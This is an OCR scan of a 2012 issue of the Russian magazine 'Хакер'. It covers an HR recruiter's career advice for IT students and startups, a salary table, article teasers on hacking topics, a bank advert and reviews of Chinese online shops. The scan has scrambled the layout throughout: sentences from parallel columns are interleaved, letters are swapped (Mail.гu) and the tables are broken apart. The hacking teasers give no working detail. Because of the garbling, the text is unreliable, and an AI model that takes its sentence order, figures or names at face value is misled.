В случае с блогом важно пони мать, что он

то язык переходить. Скорее всего, на

уже невозможно . Не помогут никакие задачи

может работать как на тебя, так и против.

как после Регl перейти на «Рельсы>> проще,

и никакая зарплата, поскольку они хотят что­

Не надо писать: << Я умный и всё знаю , а вы уны­

чем на С++ или

то свое. Дмитрий Гришин из Mail.гu решил:

Ruby,

так

Java .

лое говно! >> Нет! Благ может содержать даже

мы сделаем отдельный инкубатор для таких Интернет-сам по себе тренд. Весь . Всё раз­

людей, дадим им финансирование и не­

летается как горячие пирожки .

обходимую инфраструктуру, чтобы они

очень жесткую критику, но только конкрет­

ную и обоснованную. Например, можно написать что-нибудь вроде <<этот интер­ фейс неправильный потому и потому,

могли заниматься своими проекта-

ми . Если у людей в конечном счете

ПРО ПЕЧЕНЬКИ

а правильный должен выглядеть так>> . Если при этом предложить

ничего не получается, им снова

Помимо конкурентной зарплаты и интересной

предлагают работу по найму. Если

работы, всё чаще предлагают гибкий график.

же получается, Mail.гu Gгoup по-

Это значит, что у тебя есть некоторое количе­

могает взлететь этому проекту

ство <<присутственных дней>>, за которое ты

максимально высоко. Компа-

должен отработать определенное количество

ния дает многое, забирает

часов в офисе. Это важно, это командная рабо­

совсем небольшую долю

та- ты должен с кем-то общаться и так далее.

и позволяет людям

свой вариант, то будет вообще идеально. Вы должны показы­

вать себя профессионалом. Возможно, проект, который вы только что критиковали, вас и позовет.

Всё остальное время ты можешь работать где

делать нечто свое. Одним из таких про­

Я сама довольно много и часто хантила

хочешь. У тебя просто есть задача, которую ты

ектов сейчас является сервис микро­

на технических конференциях. Я

должен выполнять.

блогов Futubгa lfutubгa.com].

мало что понимаю там на технической секции, но вижу мальчиков с горящи­

Компании сейчас много учат и отправляют на интересные стажировки. Раньше такого

ми глазами, задающих правильные

О ПОИСКЕ РАБОТЫ

вопросы. Докладывает, к примеру,

вообще не было: мало кто был заинтересован

Если человек ищет работу, я сове­

Игорь Сысоев, а мальчик из зала за­

в системном обучении своих людей. Сейчас же

тую размещать резюме везде. Хуже

дает ему явно правильный вопрос- я к нему подхожу, даю телефон и зову

компании все чаще стали приглашать зару­

не будет. Поиск работы- это та же

бежных технологических гуру для внутренних

самая работа. К ней стоит отнестись

к нам на тестирование. Даже если

выступлений . Это очень ценно и важно.

ответственно.

я не до конца понимаю сам вопрос,

На внешней конференции хороший разработ­

Не ленись писать в компании на­

чик чаще всего закрыт

прямую. Составь список компаний ,

по реакции докладчика я вижу, что он

NDA (Non-disclosuгe

правильный.

agгeement- Соглашение о неразглашении).

которые тебе интересны. Не нужно рассылать

Все более-менее приличные зарплаты, как

Он просто не имеет права задавать многие

всем стандартное письмо. Напиши , почему

правило, закрыты определением «цена дого­

вопросы. Все мы на конференциях выглядим

ты хочешь работать именно в этой компании .

ворная». Есть причина- для них существует

как дураки: ничего ценного сказать не можем,

Например: << Я хочу в Островок.ру, потому что

вилка. То есть у

потому что это может помешать нашему бизне­

считаю этот стартап очень перспективным,

ной установки <<мы нанимаем чувака за

су. Поэтому мы говорим какие-то банальности.

мне нравится, как формируется его команда.

тысяч рублеЙ >>. Поэтому они решают: а давайте

HR

в таком случае нет конкрет­

90

Когда такого гуру привозят в компанию, разра­

Вообще , мне интересна туристическая тема,

посмотрим чуваков в диапазоне от

ботчикам спокойнее- никто ничего не укра­

и я люблю программировать на

тысяч. Если специалист будет очень хороший

дет. Они могут спокойно говорить, обсуждать

нее всего, тебя позовут поговорить.

Ruby >>. Вероят­

-заплатим ему

тим

· какие-то сложные задачи .

Если ты напишешь в

60.

150,

60

до

120

если не очень-запла­

Вот в этой вилке они свободны.

10-15 компаний, то 3-4

Стартапы пришли с модой предлагать опцио­

пригласят на собеседование. Найти адреса

ны. Раньше получить опцион было очень слож­

совсем несложно : они есть на сайте компаний.

HR СОВЕ ТЫСТУДЕНТАМ Еще несколько лет назад считалось, что

но и престижно. Их давали Яндекс, Mail.гu, и на этом, наверное, можно закончить список.

Принцип «я продаюсь раз в три года» уже

К сожалению, сейчас на рынок входят стар­

не актуален. Мы продаемся всё время, мы все

Но если ты учишься в Бауманке и nри этом ра­

тапы часто с некоторым непониманием. Одно

-товар. Если завтра ко мне придут из

ботаешь в Макдональдсе-это плохо. Не могу

Google

учиться и работать одновременно- хорошо.

дело, если ты десять лет работал в Яндексе и получил некий оп циан, и другое- три меся­ ца что-то покодил в Островке и тоже получил

оп циан. Мне кажется, это неправильно. Оп ци­ ан должен быть очень ценной вещью, иначе и ценность самой компании как-то падает. Большое количество компаний сейчас ищут сотрудников в регионах. Ищут как для фи­ лиалов, так и просто для удаленной работы. Иногда компании готовы перевезти сотруд-

ХАКЕР

03/158/ 2012

СЕГОДНЯ САМОЕ ПРЕКРАСНОЕ- БЫТЬ ПРОГРАММ ИСТОМ.

Bbl ПОНИМАЕТЕ ОСНОВЫ

БИЗНЕСА,ОСНОВЫПРОФЕССИИ,ВАСЛЕГЧЕ ВСЕГО ПОДНИМАТЬ И РАСТИТЬ 033


COVERSTORY сказать, что я зто осуждаю, ведь ситуации

ший с тартап. Хороший не в плане успешности

П отому, что лю д и н е предста в ляю т, каков

у людей бывают разные, и иногда это просто

с точки зрения бизнеса - потенциального

на самом д еле интернет. Они не пре д ставляют,

вопрос выживания.

работодателя это мало интересует. Крупным

что на самом д еле нужно, а также не со ­

размеряют собственные силы и с р едс т ва.

компаниям гораздо важнее увидеть в вас

Работать во время учебы крайне желательно

человека, который мыслит в правильном

н е ради денег, а для выбора т ого, чем зани ­

направлении и умеет кадить руками.

м а т ьс я в ~удущем . Это отличное время, чтобы

Порталам нужно всё, что связано

определиться с направлением дальнейшей

с техноло г иями, видео, мобильны-

Н е хва т ает о п ыта, св я зей, те рп е н ия, денег и всего п ро ч е г о. Д е л ай т е стар тап , пока учитесь,- мы в ас заметим.

ми платформами, социальными

деятельности.

Идите работать в большую, серьезную компанию, где вас

сетями, - это основные вещи,

Д алеко не все с первого раза нащупывают,

которые востребованы всегда

чего хотя т. Е сли, будучи студентом, ты меня­

и всеми.

научат качественному про­ граммингу, качественному

маркетингу. В ы пр осто

ешь работу раз в три месяца- это не страшно. Ты интуитивно нащуnываешь, чего хочешь . Что

Че м может быть хорош

самое важное : к последнему курсу ты должен,

первы й стартап? П ока

поработав в разных местах и пройдя стажи­

вы учитесь, скажем , в Бауманке, вы

не с н изу. Вы посмотри т е из того же Ян д екса, M ail.гu, из какой-либо за п а д­

посмо т рите наинтер н ет не вз гля д ом студ ента,

ровку в разных компаниях, определиться, кем

что-то делаете, вы пробуете. Вы смо­

ты хочешь бы т ь. Услов н о говоря, «маркетинг

трите и понимаете, что вам интересно,

ной компа н ии, то ес ть све р ху. Пл юс вы

-не мое, верстка- не мое, а вот разработка

набиваете первые ши ш ки.

обрастете связями, в е д ь л юбой п о р та л

дает очень хорошую в озможность об ­

-да!>>. Вот это будет хорошо. Не н адо о г ромного количества тусовок

расти связями.

К о к ончанию учебы важно нарастить свою

вроде стартаперски х. Люди там не ра­

те х ничес к ую компетенцию . Или, продукто­

ботают, они ходят и тры��дят ни о чем .

У вас будут связи, у вас будет по­

вую, если ты РМ, или маркетин г овую, если

Ц енность таких людей нулевая.

нимание, вы обрастете костяком

Меня пугают люди, которые в

друг, я с ним пиво пи л >>. Б уд е т д ругое:

команды. Н е будет в о т э т о г о: «Э т о мой

специализируешься на маркети н ге.

19 лет

Ес л ич еловекправильнодумаетии м еет

заявляют: «Я специалист по формиро­

<<Это офигенный программ ис т, я с ним

бэкграунд , уне г овс~получится .Затакими

ванию бренда!>>

работал в одном отд еле, мы сош л ись

с ним на общей теме, и нам интересно

людьми гоняются крупные порталы и старта­

пы, набирающие обороты, - все!

общаться>>. У вас поя в ится какое-то коли­

О СТАРТАПАХ

чес т во с в обо дн ых дене г- сей ч ас в р у н е т е

Н е ст оит о с обенно ра с с ч ит ы вать на стажиров­

Большинство стартаповна рынке- унылое

хорошо зарабаты в ают. Вам буде т лег ч е под ­

к у в большо й компании. Все порталы пред­

г ов н о . Именно поэтому у нас раз в полгода вы­

нять инвестиции, если вы скажете: << Я три го д а

лагают стажировки, но на деле не очень

ходит рейтинг

«30 лучших

команд стар­

любят брать стажеров, так как с ними

тапав Рунета>>. Зачем мы его выпускаем?

есть вот такой проекп>. Вам, ско р ее , д аду т эти

программ и л почту в Я н дексе, а теперь у меня

приходится возиться и устанавливать

Затем, что сейчас очень много «nены>>,

деньги, потому что у в ас ес т ь некий п о дт в е р ж ­

для них неполный рабочий ден ь , что мало

ведь рынок только развивается. И очень

д енный о п ыт и вы, веро ятн о, д ейс твит е л ь н о

кого устраивает .

важно объяснить молодому человеку, ко­

что-то с д елае т е.

торый не всегда сам хорошо это понимает,

У большинства порталов сейчас с у ще­

что не нужно идти в плохую компанию :

Я считаю, что свои стартапы нужно делать по­

с твуют школы и у ч енические програ м ­

там обманут, ничему не научат и вообще

сле

м ы . Например, у Яндекса есть Школа

будет «стресс, ад и всё плохо>> .

анализа данных. Если хорошо пройдешь отучишься, тебе с большой ве­

ста р тапы. Хотя нет, не так. Д е­

роятностью предложат работу.

лайте стартапы, но не связывай ­ те с ними свою основную карьеру.

Фактиче с ки ни у кого, кто начи н ал

с ебянаолимпиа д а х попрогра м ми­

Google- там

ес т ь специальные

подразделения для студентов . Если ты

хорошо себя показал, тебе сразу же сделают предложение.

Мало компаний за это берется. У н ас есть р яд программ, в том числе платная п ро г рамма

со льготными расценками для стартапо в . Е сть и бесплатная, совместно с Gгeenfield Pгoject. Мы всё равно изначально оце н и в аем, насколь ­

Можно о ч ень хорошо показать

Mail.гu,

предварительно поработав.

Мы очень часто ищем людей для стартапов. Скажу страшное- не делайте

такую программу и хорошо

рованию . Они проводятся в Яндексе,

28-29 лет,

с вою карьеру со стартапов, ничего

н е полу ч илось . Нужно быть гением уров ­ ня Цукерберга, но тогда и никакие правила

ко старта п живучий. Е сли стар т ап норма л ь­ ный, но у него пока п рос то н е т д е н ег, ч т об ы на м платить, мы пиарим вакансию за счет своих

возможнос т ей.

для вас вообще не действуют. Спасибо, что

вы просто есть!

:1

Стартапы на посевной стадии- это во многом дело хантеров. Потому что риск на этапе реа­

Ст удент, к а к н и странно, мо жет сделать хоро -

Почему не п олучаю т ся первые стартапы?

лизации идеи минимален .

Главный рис к всегда связан с командой. Сделают эти люди проект или нет, смогут или

ДАЛЕКО НЕ ВСЕ С ПЕРВОГО РАЗА НАЩУПЫВАЮТ, ЧЕГО ХОТЯТ. ЕСЛИ, БУДУЧИ

СТУДЕНТОМ, ТЫ МЕНЯЕШЬ РАБОТУ РАЗ В ТРИ МЕСЯЦА- ЭТО НЕ СТРАШНО.

не смогут? Оценить всё это на старте, хеджи­ ровать эти риски чрезвычайно в ажно. П оэ т ому, когд а старта п ы тол ь ко на ч али зарож д атьс я ,

агентство

PRUFF I было

п ер в ым, кто п о ш ел

оценивать всё это с точки зрения л ю д ей. М ы очень много сделали в этом смыс л е, поэтому,

конечно, нам было интересно изучить старта ­ пы изнутри. :К:

ХАКЕР

03/158/2012


Зарплаты специалистов [1 сентября-1 декабря 2011 года] РАЗРАБОТЧИКИ Профессия \опыт работы

3-5 пет

5-10 пет

бопее10 пет

40 000- 80 000

70 000- 150 000

170 000 - 250 000

250 000 - ...

30 000- 70 000.

70 000- 180 000 .

180 000- 250 000.

250 000 - ...•

3-5 пет

5-10 пет

бопее10 пет

30 000 - 50 000

50 000 - 70 000

80 000 - 100 000

100 000 - ...

Unix,Linux admin

30 000 - 60 000 20 000 - 60 000 •

60 000 - 90 000 60 000 - 90 000 •

90 000- 110 000 90 00 0 - 110 000 .

110000- ••• 130 000 - 150 000 .

DBA (Огасlе, MySql, Postgгes и

'о ооо

- 80 ооо 40 000 - 80 000 •

80 000 - 130 000 80 000 - 130 000.

130 000- 150 000 130 000 - 150 000 .

150 000- 180 000 150 000 - 180 000 *

Team

leadeг

0-3

года

Разработчик под ппатформы Andгoid,

iOS

Разработчик Регi/РНР

Разработчик

Ruby on Rails

СИСТЕМНЫЕ АДМИНИСТРАТОРЫ Профессия \опыт работы Ведущий

Windows

0-3

года

администратор

т.д.) Руководитепь группы системных администраторов

GAME

90 000- 150 000

150 000- 180 000

180 000- 250 000

90 000- 150 000.

150 000- 180 000 .

180 000- 250 000 .

3-5 пет

5-10 пет

бопее10 пет

ИНДУСТРИЯ

Профессия

1 опыт работы

0-3

года

Неб-разработчик

Flаsh-разработчик

Game

ргоduсег

ЦВЕТ

-

востребованность осталась на прежнемуровне

востребованность увеличилась менее чем на 50 %

востребованность увеличилась более чем на 50 %

востребованность уменьшилась менее чем на 50 %

ХАКЕР 03/158/2012

• Заработная плата прошлого квартала

035


Preview

33 страницы журнала на одной

полосе.

Тизер некоторых статей .

PCZONE 38

ВКИТАЙЗАПОКУПКАМИ? tотни тысяч товаров по самым низким ценам - где еще ты найдешь такое

предложение, если не в китайских интернет-магазинах? Такого нет даже наеВау!Близостькпроизводствуи огромная конкуренция играют на руку

покупателям. Из Китая можно за казать самого черта и по самой низкой цене. При этом тебе не нужно морочиться с оплатой доставки - все из д ержки берет на себя продаве ц . Мы подготовили длятебяобэорпровере н ныхторговых площадок, гд е приобести интересую­ щий товар ты можешь с минимальным

риском. Обсудим мы и важные советы по он лайн - пок у п ка м с уче том специфики поставщиков из Поднебесной.

взлом

PCZONE

ПРОВЕРКА НА ПРОЧНОСТЬ

ФРЕЙМВОРКДЛЯХАКЕРА

1CANCRACKIT!

Наша задача-автоматизированно

Анализ структуры сайта, брутфорс форм,

Управлениеправительственнойсвязи

решить САРТС Н А. Как это сделать без

поиск уязвимостей, эксплуатация дырок,

Великобританиинедавноопубликовало

реализации фильтров, слож н ых нейрон­

обход 105 - лишь малая часть того, н а что

задачки для хакеров. Мы решили их по­

ных сетей и ОСR-систем?

способны плагины проектаwЗаf.

смотреть и заодно решили.

взлом

ФАЛЬШИВЫЕ СМ(

Партерка-при м ан ка-подписка- взгляд изнутри о том, как устроены и на чем

зарабатывают многочисленные СМС­ лохотроны.

036

MALWARE

ВЕСЕЛАЯ ТРОЙКАБУТКИТОВ Самыетехнологичныеугрозы

2011

года в

веселых картинках. Кто из разработчиков малвари уд ивил антивирусных аналити­

ков больше всего?

МАЛВАРЬДЛЯ МОБИЛЬНЫХ ОКОШЕК Вирусовдля

Windows Phone 7.5 пока

нет. Но появятся ли они в будущем?

Разбираемся во внутренностях новой мобильной ОС от Microsoft.

ХАКЕР

03/158/2012


А АnьФа·Банк

Оформить дебетовую или кредитную «Мужскую карту» можно в отделениях ОАО «Альфа-Банка», а так же заказав по телефонам:

(495) 229-2222 в Москве 18-800-333-2-333 в регионах России (звонок бесплатный) или на сайте

www.mancard.ru

(game}land


PCZONE

Роман Володин (biohedge!Ogmail.coml

Кита СЕМЬ КИТАЙСКИХ ИНТЕРНЕТ­ МАГАЗИНОВ СО ВСЯКОЙ ВСЯЧИНОЙ Где максимально дешево можно купить планшетник на Aпdгoid?

Или осциллограф? Или, к примеру, лазер? А запчасти для разбитого смартфона? Да там же, где и десятки тысяч других самых разных

товаров, которые в огромных количества х штампуются в Поднебесной, -в китайских интернет-магазинах. И, что важно, по самым доступным ценам .

MADE IN CHINA Три знакомых слова

о нескольких из них- тех, с которыми имел

<<Made in China >>

давно

обос н авались на о гр ом н ом количестве все­

дело либо я сам, либо мои др узь я. Сразу хочу предупредить, что выбор магазина- вопрос

возможных товаров, в особенности на технике.

субъективный. Перед любой покупкой обяза­

Гл у по было бы предполагать , что рядом с про­

тельно почитай отзывы и имей в виду- все гда

изводством не появятся огромные интернет­

есть не которая вероятность, что посылка

магазины, где всё это д обро можно купить

потеряется , что товар окажется бракованным,

по максимально ни зкой ц ене. Д умаю, многие

что в коробку положат что-то не то или соберут

слышали о наиболее раскрученном магазине

комплект не полностью- такое случается

-

DeaiE xtгeme.com, - даже если е щ е ничего

везде, без исключений. Н о за те цены, которые

в н ем не заказывали. Н о подобных магазинов

предлагают подобны е ма г ази ны , многие г ота·

д овольно много. Сегодня я хочу рассказать

вы с этим мириться. П риступ им?

ХАКЕР

03/158/ 2012

'


В Китай за пок у пками ?

FocaiPrice.com Категории товаров: eJ~EJ~

0Ь06p3'n>I0Тef'CipMtO

Способы оплаты:

R ICQQJнн•

R:>ealprice ·~.;о •

;\'\ HOOIIHI(H

Бестсе/VIеры

,., Сnецнаnьные nредnоження

Dropshlpplng

Оrзыsы

PayPar€'

Форуны

&с8АН•-•• СкмАQ

[не для всех товаров]

Q :zo М 42. S

.............

от 14 до 25 дней

Срок доставки:

В14део

r Q>On!IID!lh

Дmi~'IG~Ait Иrруwкм Хо6бм ЧiКIII

Один из лидеров китайской электронной

АатомОбмnW~wе <11(Q!(CyitPW

коммерции предлагает более 70 000 наимено­

613 CIUI8A-Й КQ,ц-1'1

Ст1:рео Н.'(IUHMK

Чi!:ltOJiдii•I PidiCI:IoopH I!:

Мotorola59B~

~ US$7.49

~ USSl

ваний товаров в почти 100 категориях [гадже­ ты , аксессуары к ним и так далее] . По край­ н ей мере, так он сам заявляет. Проверить эти данные сложно, но то, что здесь можно найти

~

самого черта,- это точно. В ассортименте

./

возврат стонмоаи

магазина имеются копии именитых б рендав

./

t,есплатый ремоlfТ о rечеине 18Dдней

[ох уж эти китайцы], телефоны и оргтехника

в теценне

90 дней

Мобильные телефонw

• Те~~еФо-

.u~ Androtd • TUie:ФO- С tl!:tCC\PНWOI • Qwerty тt,!J~eФOttw

вполне приемлемого качества [судя и по лич­ ному опыту, и по отзывам] .

Комn1>10теры и конме

Фотоаnnв ратw

"

• Ч~wмll.ei\cw

• 1'\nанwе'"..м:

• МР3

~

• КА&еllммде.Р*о'те/IМ

• ltJwo8м.rypw

• Aa'nмtollмn ... welк(I!C(y

• 1Ca6e/ltt ., npeo6pa:JO•aтe

Аксессуары

Apple

• Сец:-

• Аксео:уl""'~~

Первое, что привлекло меня при знаком­

nк м нoYJfi

.. ttWWIUII

НР-4 м

MPS

емео

• Нio'(IUHIUtM

• Alc.cy"YII•ro~ к :IAPI'Att

o6opyAOfla-

~Оnоеещения

~ в,-...-..-·- -

ст ве с магазином, - это цены. У некоторых

товаров они были ниже, чем на еВау [да-да, китайцы продают немало своего товара

этот раздел может служи ть <<nесочницей>>,

и на западном аукционе, но мы этот момент

где можно купить прикольную мелочевку

Впрочем, доставка, как и везде, может затя­

рассматривать не будем]. Как оказалось поз­

и присмотреться к сервису, не тратя значи­

нуться. Обычно посылка при хо дит не раньше ,

же, возможность продавать по ценам ниже

мых сумм.

чем через две недели. Если ты сделаешь за­

Каждый товар имеет описание, рейтинги

рыночных обусловлена территориальной бли­

как у почти всех магазинов такого плана.

каз свыше $20, то <<Фокал>> любезно привяжет

зостью магазина к заводам -изгот овителям.

и отзывы, которые помогут сделать выбор .

к твоей посылке трек-номер для отслежива­

Более тог о, «Фока л >> открыто предлагает

Для оплаты можно использовать PayPal.

ния статуса отправления .

оставить на форуме магазина сообщение

С недавних пор FocaiPrice стал принимать

о том, что ты нашел какой-либо из това-

и

WebMoney, но пока не для всех товаров .

В целом ресурс оставляет приятное впе­ чатление , но, судя по отзывам, и он не лишен

ров дешевле,- в таком случае цена будет

Магазин часто проводит различные акции,

в сех стан дартны х проблем <<ки тайски х>>

пересмотрена. Посетителям также доступен

а для некоторых предложений есть ски­

магазинов: задержки, недокомплект, несоот­

раздел со спецпредложениями, которые

дочные купоны, коды которых можно найти

ветствие характеристикам.

отсортированы по ценам, начиная от одного

в интернете.

доллара. Для сомневаю щихся или новичков

Что касается доставки, то она бесплатная,

КАТЕГОРИИ ТОВАРОВ

ШЕСТЬ СОВЕТОВ ДЛЯ НАЧИНАЮЩИХ 1.

Купоны- это отличная возможность сэкономить немного денежек . Причем получить код купона

совсем не сложно: их раздают на сайтах вроде гeta il menot . com [крупнейший, но англоя зы чный ресурс] , chinaprices.гu , а также в темат ических сообществах . В конце концов, можно банально вбить в поисковик <<куnон на скидку <ИМЯ магазина»> .

2. Чтобы быстро найти интересующий тебя товар и сравнить цены, можно nоnробовать сначала восnользоваться специализирован ными nоисковиками. Например seaгchsku.гu ищет по двадцати разным магазинам. Такой же сервис есть и на сайте ch i napгices.гu .

3.

Перед покупкой не поленись полазить по форумам, nочитать информацию о том или ином магазине- это может здорово nомочь . Изучай nлощадки. Изучай, изучай и еще раз изучай.

Dl

Мелкая электроника

r::]

Товарыб;ля

fl

Сувениры

11

Бижутерия

а

Товары для

I!J

Товары для

автомо

иля

здоровья

детеи

~

u ~

6 D м

Товары для дом а

Игрушки Часы Спортивные товары

Одежда Музыкальные инструменты

Сообществ шоnоголиков сейчас хватает - к примеру, форумы ebay-foгum.гu и mySku.гu .

4.

Если вдруг произошла какая-то накладка [допустим, nри о тправке , доставке] или есть вопросы по ассортименту- не стесняйся писать в поддержк у. В штат е некот орых магазинов даже есть русскоговарящие сотруд ники.

5.

При оплате заказа нужно исnользовать только nроверенную платежную систему. В боль шин стве случаев это

PayPal . Некоторые китайские магазины поддерживают WebMoney и даже Qiwi, но, PayPal- они оче нь ловко умеют решать проблемы

тем не менее, я рекомендую использовать

СПОСОБЫ ОПЛАТЫ

PayPal· weьmoney ~;;.

Pa yPal WebMoney

с нерадивыми продав цами.

6.

Терnение, терnение и еще раз терnение. Заказывая через интернет, н ужно быть готовым

Qiwi

подождать. Заказ могут долго формировать, долго отправлять, а затем задержать на таможне

или на каком-нибудь этапе работы многострадальной П очты Ро ссии.

ХАКЕР ОЗ

/158/ 2012

Кредитные карты

039


PCZONE

Dealextreme.com Категории товаров: Hom8

$2 Gadgeta

РауРаГ

Срок доставки:

ОТ

21

Тор Sellll"'

Ordar Tracklng

*

Foruma

~ews

SDC..'(I,>INd;I"'IO>e~~Digl:.lloU~m«..,LCOOI;;.!Iy~,I......._C!> а -

• .....• ._"" "EISV 10 Say, fosy ta S1 ~~· • STAAS ol OIC VJdeo Cont~5t "-"с o;ome outl

с---~

Способы оnлаты:

Oeals ~

New Arr1vat s :\\

-

IJ t. a_

-

ДО

_.

40 Д НеЙ

._

Сложнонеупомянутьодинизсамыхизвес~

--·-

ны х китайских магазинов- DeaiE x tгeme . com . Свой первый опыт покупки в китайских

~.,

интернет-магазинах я пол учил именно здесь.

......

-·-·--

Чего я только не заказывал: и защитные

пленки, и батарейки, и фонарики, и экран для телефона, и всевозможные аксессуары. Рас­

-

Adulr.Toyi(Нot]

сказывать тут особенно и нечего: этот ресурс

уже опробовали тысячи людей. Основное на­ правление магазина- гаджеты, представлен­

C.rtiolder S~e J НOunl

USB Ooclr.lng Statlon

E271 .SW65001<158·

Chllrgerwolt\US8

LumenЗO·I..!OWMe

for iPI>one4/ 45 - !lll(lr.

Dat.a / ~rgl ngcaЫeror

l..iohl Bulb

( АС

CII~CitiveScree n TouchlngК.ndWormer

Gloves • BI.adc(PII<-)

ные в астрономических количествах и по очень

привлекательным ценам. Е сть двухдолларо­ вая зона для мелочевки, разделы новинок

Отследить отправление можно по тр ек-номеру,

и с пецпредложений . Аналогично TiпyDeal ,

который предоставляется бесплатно пр и за­

ресурс предлагает зарабатывать и копить

казе свыше

бонусные баллы, п убликуя описания или видео

и отзывы на форумах, можно резюмировать:

можно быстрее, то лучше воспользоваться

к товарам. Выполнить оплату клиент может

D ealextгeme- достойный магазин, у которого

другим ресурсом, особенно это касается людей,

через

всего один недостат ок: серьезная медлитель­

которые занимаются дропшиппингом [посред­

ность [посылку можно ждать больше месяца!,

ничеством!.

Pa yPa l

или с п омо щью кредитной карты ,

при этом за доставку никто ничего не возьмет.

$15. Учиты вая

собственный опыт

что связано с громадным количеством заказов .

Итог: один из самых раскрученных мага­ зинов. Но если тебе нужно получить товар как

"

Tinydeal.com ';..[

о

1 Toup (08)

Категории товаров:

t:::::::"'

..._,."_.

Способы оплаты:

IPhoм, 1 ~ м

РауРаГ

....._..

-

-.д_,.

Срок доставки:

ОТ

7 ДО 25

днеЙ

lhd

..

~~:-- . Кр-.

.. , , . . _

Дрн м Dфме

В ассортименте онлайн-магазина пред­ ставлены электроника, уникальные гаджеты и множество самых разных товаров , причем

Иrp'f\IU!IIIIxa66tl . . _ .. дi)uOЦIItlltOCПO

Лидеры продаж )

Cnopflla'I'AWX

~tl:li'lqi-U

~

зa,.,s--c.u..aw

каждый месяц появляется несколько тысяч новинок . Для каждой позиции представлены

подробное описание, рейтинги и отзывы, а иногда видео и русскоязычные коммен­

тарии. Порадовал также онлайн-чат, где я смог быстро получить ответы на интере­ сующие меня вопросы, причем на русском

языке. На сайте есть раздел спецпредло ­

дарков. Помим о

жений с еженедельными скидками, а также

ются кредитные карты и WеЬМопеу. Впро­

ко товаров, то для получения бес платн ого

пятидолларовая зона для мелких товаров.

чем, я все равно настоятельно рекомендую

треки н г-номера цена хо тя бы одного из них

Цены более чем приемлемые , дополнительно

осуществлять все сделки через

винтернетеможно найти купоны на скидки

более надежно, легче оспорить транзакцию .

должна быть выше $20. В противном случае за треки н г придется доплатить $2-3. Перв ой

[5-7 %1. Плюс ко всему прочему есть воз­

К тому же на оплату картами сейчас д ейству­

моей покупкой в этом магазине был телефон,

можность по купать товары за баллы [так

ет ограничение в $150.

и всё прошло как нельзя лучше.

называемые ТО Poiпtsl , которые начисляются

Pa yPal,

к оплате принима­

PayPal-

зто

Доставка в любую точку мира бесплатна.

один нюанс: если в тво ем заказе несколь-

Вывод: о тличны й магазин с широким ас­

за публикацию комментариев и обзоров .

Посылка идет, как и везде,две-три недели [бы­

сортиментом, адекватные сервис и поддерж­

Приятный бонус- при заказе на сумму

вает, что доходит и за неделю, но это случается

ка - например, если при получении чего-то

свыше

редко!. Трек-номер для отслеживания посылки

не хватает, то после обращения обычно без

выдается при заказе свыше

проблем высылают недостающее .

$200

тебе предложат выбрать один

из нескольких возможныхнебольших по-

01,0

$35, но тут есть

ХАКЕР

03/158/2012


В Китай за покупками?

Pandawill.com Категории товаров:

МоА uкаукт

mD м

Ht llo , Sign ln Or 1'8g1stor

n

Поисхаn. мсь мага1мн 3Д8СЬ

Способы оплаты :

РауРаГ -

Срок доставкiА:

от 25 до 35 дней

AxceccyapAppie

С0Т08Ы1611Теnефон

Пn11W8T

Дolol

Мода

Од8*д8Д8Т8Й

(i

П оиск

~~·...----.....,....,..,.~

ХО1,1ПЫОТ8р

-~

fJflЬi;(ё~

Ht'lp

[] RSS

~~~'

~

НС18НН1М

-

Ruulan 1 USD

&'М

live

1611 коо,..а(О)

-

6р3НАW

-~

BceiCaТ8ropt81'"'

All Free Shipping! -

Еще один китайский интернет-магазин, ко­

~* ' -

ПРАЗрНИЧНЫЕ КОДЫ КУПОНОВ:

<:" P~NDAWILLB0-5 ,

PANDAWILL150-10, PANDAWILL200-15,

PANDAWILLЗ00 -30,

Подробнюи

'\.

' "~·

PANDAWILL400-50, PANDAWILL500 ;~5 -

торый мало ч ем выделяется сре ди конкурен ­

Прямь1е nоставки/Опт Дflillj)a)МOЩotiiUI»-IIInpRIIIYIO

тов. Н о, на мой взгляд, магазин максимально

IIOCTHI()IIo\IJolont,~\QfфoptoiOЦiolll,

фотоrрефt~А

roupoe 503 noro Pandow'l.

м:r.с 'Фi'·!J!:W

адаптирован для русскоговарящих покупате­

лей. Судя по отзывам, се г одня он один из лиде­

В се о

последних

ров по числу продаж в страны СНГ. Н а форуме

новинках nодпис•mься сеичвс?

сайта доступен активный русскоязычный раздел, а представитель магазина часто

Вынrраrь

встречается с потенциальн ыми п оку пателями

Бесплатные ЛOAiJPKII

Тол•ко

на тематических ру сских форумах- короче говоря, саппорттут отмен ный. Из заметных преимуществ магазина- наибольший ассор ­

Популярные товары

тимент телефонов (в том числе и с за косом

Мода

Новинки

An•

Лю6мтепейl

# Распродажа

Отправьте

Пnаншаты

нам фотографию

под популярные марки ! . Один мой знакомый при обрел в Pa ndawill поп уляр н у ю китайскую

ПniMU/e'fP!oo!Й IIONI!bwn.p

вawero малыwа

Alno1Novo7Aurora

н nолучите nодаро~е

Arldtokl4.0 HrfACHIIPS Э кр111 8GB 1GB RАМ

мо д ел ь телефона и остался доволен как самой

Topon~necьl Коnичес:тео

US$115.99

покупкой, т а к и быстрой д оста в кой, кото рая

заняла всего десять дн ей. Советую не забыть про раздел распродаж- там де йствительно

можно найти очень дешевые т овары . Оnлата через PayPal и ли картами Visa и Master Сагd,

предоставления бесnлатного трек-номера: его

причем можно пол учит ь заметную ски дк у

можно получить только nри заказе на сумму

магазин для русскоязычного пользователя,

по купону. До ставка буд е т бесплатной. Един­

с выш е $50 (тут по сравнению с конкуре нтам и

хотя и не с самыми ни зкими ценами на попу ­

стве нное, что мне не понравилось,- ус л овие

« Панда >> явно проигрываетl.

лярные товары.

Общее впечатлени е: отличный китайский

ТРИ ДОПОЛНИТЕЛЬНЫХ МАГАЗИНА NOWSUPPLIER.COM Категории товаров:

m

Способы оплаты: Срок доставки:

MERIMOBILES.COM

BUYINCOINS.COM

Категории товаров:

m~

PayPar -

Способы оплаты:

PayPal

от

Срок доставки:

от

~Е] fj

6

7 до 25 дней

Категориитоваров: m~во -

14 до 25 дней

Способы оплаты:

PayPal· -

Срок доставки:

от

7 до 25

дней

Многие люди успешно nриобретали в этом

Интернет-магазин от предприимчивы х

Порадовала весьма быстрая lи, кстати,

магазине планшеты и прочие гаджеты ,

американцев. Посылки приходят из Китая ,

бесnлатная) доставка , особенноучитывая

но у меня был печальный опыт: заказав

хотя в поддержке работают одни << штатовцы >>.

nредновогодние дни. По широте ассортимента

и оплатив телефон, я получил модель с

Заказывал у ни х по мелочи- чехол , ЗG-модем

сайт не уступает конкурентам. Из нареканий

урезанным функцианалом (на $30 дешевле)

и стилусы . Как у всякого уважающего себя

-только периодические лаги сайта. Если

и не того цвета . Печален даже не сам факт

